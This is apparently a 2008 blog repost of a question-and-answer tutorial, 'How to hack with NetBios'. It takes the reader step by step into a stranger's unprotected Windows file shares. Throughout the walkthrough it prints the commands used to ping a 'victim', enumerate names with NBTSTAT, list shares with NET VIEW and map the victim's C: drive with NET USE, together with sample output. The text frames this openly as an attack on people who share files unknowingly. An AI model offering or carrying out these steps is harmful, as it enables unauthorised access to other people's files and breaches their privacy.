How to hack with NetBios

Q: What is NetBIOS?
A: NetBIOS stands for “Network Basic Input Output System”
and is a way for computers in a network (LAN or WAN)
to share files and printers. (many other uses aswell, but beyond the
scope)

Q: How is this interesting to me?
A: As you now know, it is used to share files.
This can be exploited. Many people share their entire
hard-drive without even knowing it. Most of the time,
theese “shares” will not be password protected.

Q: Can i accsess these files from my own computer you mean?
A: Sure. That is what this tutorial is all about.

Q: How?
A: If you have Windows installed, you allready got all the
tools you need to access remote shares.

Q: Can you show me?
A: Sure.
================================================================
C:\windows>    <—this is what your terminal looks like when you
initiate the attack.

I could start talking about finding IP’s too, but that would be off topic,
so you are going to have to read another tutorial on that if you dont know
it.
lets just say the victim’s ip is 123.123.123.123

Now… lets make sure the host is there.

C:\windows>PING 123.123.123.123

what you want to see then is:

Reply from 123.123.123.123: byte=32 time<1ms TTL=128

WE NOW KNOW TARGET IS ONLINE.
—————————————————————–
Next step is to see if target is sharing anything:

C:\windows>NBTSTAT -a 123.123.123.123

Name               Type         Status
———————————————
L337           <00>  UNIQUE      Registered
NSDAP          <00>  GROUP       Registered
L337           <03>  UNIQUE      Registered
L337           <20>  UNIQUE      Registered
NSDAP          <1E>  GROUP       Registered
STEALTHWASP    <03>  UNIQUE      Registered
NSDAP          <1D>  UNIQUE      Registered

What does this tell us?
L337 is the computername.
NSDAP is the name of the workgroup.
STEALTHWASP is the currently logged in user.

BUT there is some even more valuable information there.
Do you see the <20> on the 4th line? That means the victim has filesharing
enabled.
If there was no <20> there, we could just forget doing the NetBIOS exploit
on this target.
—————————————————————–
Next step is to see the shares, if any. This may still be a dead end.

C:\windows>NET VIEW \\123.123.123.123
Shared resources on 123.123.123.123

Share name            Type          Comment

——————————————–
C                     Disk
D                     Disk
Command completed successfully.

NOW WE KNOW THE SHARE-NAMES.
—————————————————————–
All that remains now is to “MAP” a share…

—————————————————————-

C:\windows>NET USE K: \\123.123.123.123\C
Command completed successfully.

CHANGE TO K: IN DOS OR OPEN WINDOWS EXPLORER, AND YOURE IN…
==========================================================================================

Commands used in this tutorial:
PING
NBTSTAT -a IP (123.123.123.123)
NET VIEW \\IP
NET USE K: \\IP\SHARENAME

http://www.datastronghold.com/security-articles/hacking-articles/netbios-hacking-by-stealthwasp.html

~ by empa7hy on July 7, 2008.